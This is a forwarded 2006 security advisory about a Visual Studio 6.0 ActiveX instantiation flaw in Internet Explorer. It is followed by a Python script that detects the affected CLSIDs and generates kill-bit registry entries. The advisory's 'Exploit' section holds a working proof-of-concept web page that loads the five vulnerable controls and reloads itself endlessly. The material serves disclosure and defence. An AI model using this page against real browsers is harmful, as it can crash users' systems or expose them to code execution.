Thread-topic: [NT] Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, August 20, 2006 8:27 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Visual Studio 6.0 Multiple COM Object
> Instantiation Vulnerability
>
> Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
>
> Multiple vulnerabilities have been found in Visual Studio 6.0.
> When Internet Explorer tries to instantiate the TCPROPS.DLL,
> FP30WEC.DLL, mdt2db.dll, mdt2qd.dll, VI30AUT.DLL (Visual Studio
> 6.0) COM objects as ActiveX controls, it may corrupt system
> memory in such a way that an attacker may cause a DoS and possibly
> execute arbitrary code.
>
>
> Vulnerable Systems:
> * Visual Studio version 6.0 with Internet Explorer version 6.0 SP1
>
> Exploit:
> <!--
> // Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
> // tested on Windows 2000/2003
>
> // http://www.xsec.org
> // nop (nop#xsec.org)
>
> // CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}
> // Info: FpFile Class
> // ProgID: WECAPI.FpFile.1
> // InprocServer32: C:\WINDOWS\System\FP30WEC.DLL
>
> // CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60}
> // Info: TCExtPage Class
> // InprocServer32: C:\PROGRA~1\MICROS~1\Common\Tools\TCPROPS.DLL
>
> // CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}
> // Info: FpaFile Class
> // ProgID: FpaFile.FpaFile.1
> // InprocServer32: C:\WINDOWS\system\VI30AUT.DLL
>
> // CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739}
> // Info: Microsoft Data Tools Query Designer
> // ProgID: MSDTQueryDesigner2
> // InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2qd.dll
>
> // CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739}
> // Info: Microsoft Data Tools Database Designer
> // ProgID: MSDTDatabaseDesigner2
> // InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2db.dll
> --!>
>
> <html><body>
> <object
> classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object>
> <object
> classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object>
> <object
> classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object>
> <object
> classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object>
> <object
> classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object>
> <!--
> </body>
> <script>location.reload();</script>
> </html>
>
>
> Additional Information:
> The information has been provided by nop <mailto:nop@xxxxxxxx> .
> The original article can be found at:
> http://www.xsec.org/index.php?module=releases&act=view&type=1&id=15
>
>
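A defender's check for the five controls named in the advisory, as an added example that is not part of the original bulletin or of the researcher's code: it flags `<object>` tags in captured HTML whose `classid` matches one of the listed CLSIDs and builds a `.reg` file that sets the Internet Explorer kill bit for them. The kill bit (`Compatibility Flags` = 0x400 under `ActiveX Compatibility`) is the standard IE mechanism and is not mentioned in the advisory; the function names and the sample page are constructed for illustration.

```python
import re

# CLSID -> module, copied from the advisory above.
ADVISORY_CLSIDS = {
    "9AF971C5-8E7A-11D0-A2BB-00C04FC33E92": "FP30WEC.DLL",
    "AB39F080-0F5D-11D1-8E2F-00C04FB68D60": "TCPROPS.DLL",
    "CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8": "VI30AUT.DLL",
    "E9B0E6CB-811C-11D0-AD51-00A0C90F5739": "mdt2qd.dll",
    "E9B0E6D4-811C-11D0-AD51-00A0C90F5739": "mdt2db.dll",
}

# classid of an <object> tag: any case, quotes and braces optional,
# attribute may sit on a later line than the tag name.
_CLASSID = re.compile(
    r"""<object\b[^>]*?\bclassid\s*=\s*["']?\s*clsid:\s*\{?"""
    r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?",
    re.IGNORECASE,
)

def find_flagged_objects(html):
    """Return (clsid, module) for each <object> whose CLSID is in the advisory."""
    hits = []
    for match in _CLASSID.finditer(html):
        clsid = match.group(1).upper()
        if clsid in ADVISORY_CLSIDS:
            hits.append((clsid, ADVISORY_CLSIDS[clsid]))
    return hits

KILLBIT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
               r"\Internet Explorer\ActiveX Compatibility")

def killbit_reg(clsids):
    """Build .reg text setting Compatibility Flags = 0x400 (kill bit) per CLSID."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in sorted(clsids):
        lines.append("[%s\\{%s}]" % (KILLBIT_KEY, clsid))
        lines.append('"Compatibility Flags"=dword:00000400')
        lines.append("")
    return "\r\n".join(lines)

# Constructed sample page: two advisory CLSIDs (varied spelling), one unrelated.
SAMPLE = """<html><body>
<object
 classid="clsid:{9af971c5-8e7a-11d0-a2bb-00c04fc33e92}"></object>
<object classid='CLSID:E9B0E6D4-811C-11D0-AD51-00A0C90F5739'></object>
<object classid="clsid:00000000-0000-0000-0000-000000000001"></object>
</body></html>"""

if __name__ == "__main__":
    print(find_flagged_objects(SAMPLE))
    print(killbit_reg(ADVISORY_CLSIDS))
```
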